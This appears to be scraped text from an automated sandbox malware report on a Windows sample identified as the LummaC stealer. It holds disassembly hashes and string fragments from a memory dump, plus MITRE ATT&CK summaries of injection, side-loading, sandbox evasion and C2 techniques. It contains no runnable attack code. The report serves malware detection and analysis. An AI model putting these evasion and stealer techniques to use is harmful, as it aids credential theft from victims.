I, xrefs: 0043557B
@, xrefs: 0043558B
M, xrefs: 004355FB
n, xrefs: 004355DB
w, xrefs: 004355AB
w, xrefs: 0043560B
B, xrefs: 004355BB
w, xrefs: 004355EB

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: @$B$I$M$M$n$w$w$w${
API String ID: 2610073882-107698455
Opcode ID: ab3887d30e3722694ae608fbe2f67bad5447ff94b4c96e7c65772842505ec7d9
Instruction ID: 98db062ebe88b344e68650dcc61ca98e19cf2be95f323bb73bd2d7efb9dc93ed
Opcode Fuzzy Hash: ab3887d30e3722694ae608fbe2f67bad5447ff94b4c96e7c65772842505ec7d9
Instruction Fuzzy Hash: 2051B27000CBC1CAD3319B2889487DFBFD0ABA6325F044A5DE5E95B392D2795149CB57

Function 0043692F Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 173COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00436939

Strings

G, xrefs: 00436A3F
A, xrefs: 00436A2F
U, xrefs: 00436A27
D, xrefs: 00436A17
5, xrefs: 00436A47
@, xrefs: 00436A1F
U, xrefs: 00436A0F

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: String
String ID: 5$@$A$D$G$U$U
API String ID: 2568140703-1129986920
Opcode ID: 5ba2accf08e96b35365ca38253f6ca9e90d12fb7daf529c73cde2cde277dc13d
Instruction ID: ce4ac78f2c9a03253cd27da82e698a6dcf8cbd2f7a8bc94fa448352bf5082b86
Opcode Fuzzy Hash: 5ba2accf08e96b35365ca38253f6ca9e90d12fb7daf529c73cde2cde277dc13d
Instruction Fuzzy Hash: 216133717087828FC7399A28C4903EEB7D2ABD9324F19893DD5EE87381DB785841DB46

Function 00437346 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 63COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00437350

Strings

q, xrefs: 004373AB
b, xrefs: 0043739B
r, xrefs: 004373CB
3, xrefs: 0043736B
}, xrefs: 004373BB
|, xrefs: 0043738B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: 3$b$q$r$|$}
API String ID: 1927566239-1808240831
Opcode ID: 165f4a3351da8e188072ee6a8ac52cc60e5b3bc3d3162db07c75b0c250bbdaad
Instruction ID: e321d04ab1975e048d09bd81f9b4f8a600a365d6cec70ded9e97ed63f8b4ed34
Opcode Fuzzy Hash: 165f4a3351da8e188072ee6a8ac52cc60e5b3bc3d3162db07c75b0c250bbdaad
Instruction Fuzzy Hash: 7B31E27000C3C5CEE335DB688055BDEBBE0ABA6314F048A5EE5E987392C7B45245CBA3

Function 00435819 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00435823
VariantInit.OLEAUT32 ref: 00435836

Strings

1, xrefs: 00435876
!, xrefs: 0043584E
), xrefs: 0043589E
6, xrefs: 00435894

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: !$)$1$6
API String ID: 2610073882-2430674162
Opcode ID: 46a4f2a88f0a27ad27db05e9c2184f1e50da714be2b14fd954b80dd3721c3a9f
Instruction ID: ef037d5a65c80a7510610f02ec68bde637cc43d9b95100336681280b4eacfd94
Opcode Fuzzy Hash: 46a4f2a88f0a27ad27db05e9c2184f1e50da714be2b14fd954b80dd3721c3a9f
Instruction Fuzzy Hash: 2741C27000C7C1CED321DB68845878EFFE0ABA6314F088E5DE5E547292D7B6950ADB67

Function 00436BA9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00436BB3
VariantInit.OLEAUT32 ref: 00436BC6

Strings

6, xrefs: 00436C24
), xrefs: 00436C2E
1, xrefs: 00436C06
!, xrefs: 00436BDE

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: !$)$1$6
API String ID: 2610073882-2430674162
Opcode ID: 66cea7112b2d13d04cbdfe23abceb0edd02912b07dde822bd719ae22211a993b
Instruction ID: c1ad2943806f5dab4a31282759e045aed3dec1fc7fa73a59c1e5ab3356d68e8e
Opcode Fuzzy Hash: 66cea7112b2d13d04cbdfe23abceb0edd02912b07dde822bd719ae22211a993b
Instruction Fuzzy Hash: 3F41927000C7C28ED331DB68844875EBFE0ABA6314F084A5DE5E58B392D7B69509DB97

Function 00440A10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

Strings

dw, xrefs: 00440A35
r{, xrefs: 00440A45
e}, xrefs: 00440A2D

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: dw$e}$r{
API String ID: 0-3703138658
Opcode ID: 191829da45de68fac09d02cf1fa21b6fb1cd7cb0c54fc9a389e9dd05a3671094
Instruction ID: 5f38cc40bd2e1ca01bd49ab5ed66a1eb0fb749f6949413d3da4a11c9221744cf
Opcode Fuzzy Hash: 191829da45de68fac09d02cf1fa21b6fb1cd7cb0c54fc9a389e9dd05a3671094
Instruction Fuzzy Hash: 713149B0008384DFE3608F10D855B5BBBF4FB85709F50491DF5C89A291DBB9A508CB9B

Function 00434D32 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON

Download Yara Rule

Strings

ozvq, xrefs: 00434EB7
ww}x, xrefs: 00434ECC

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: ozvq$ww}x
API String ID: 0-1088257399
Opcode ID: 1ea20cfe7b218d8999d0168afc112e227b0c6982a386fbfaf09f458de4978902
Instruction ID: 46ae0697e0311e5ae51234bfb95f2a9ec7df673389d21a4cb454b55fdea8742e
Opcode Fuzzy Hash: 1ea20cfe7b218d8999d0168afc112e227b0c6982a386fbfaf09f458de4978902
Instruction Fuzzy Hash: 2A6128315047408BE7328F26C841BA3BBE2AF96314F18895ED0EA4B7D2C739B506CB59

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report webNY0O9Sr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
webNY0O9Sr.exe

Function 0040F930 Relevance: 16.6, Strings: 13, Instructions: 393
COMMON

Function 00410561 Relevance: 7.8, Strings: 6, Instructions: 296
COMMON

Function 00448250 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 0040CFD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 182
threadCOMMON

Function 0040E9C0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233
libraryCOMMON

Function 00447C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
memoryCOMMON

Function 00444C63 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9
memoryCOMMON

Function 004467CC Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Function 00444B70 Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON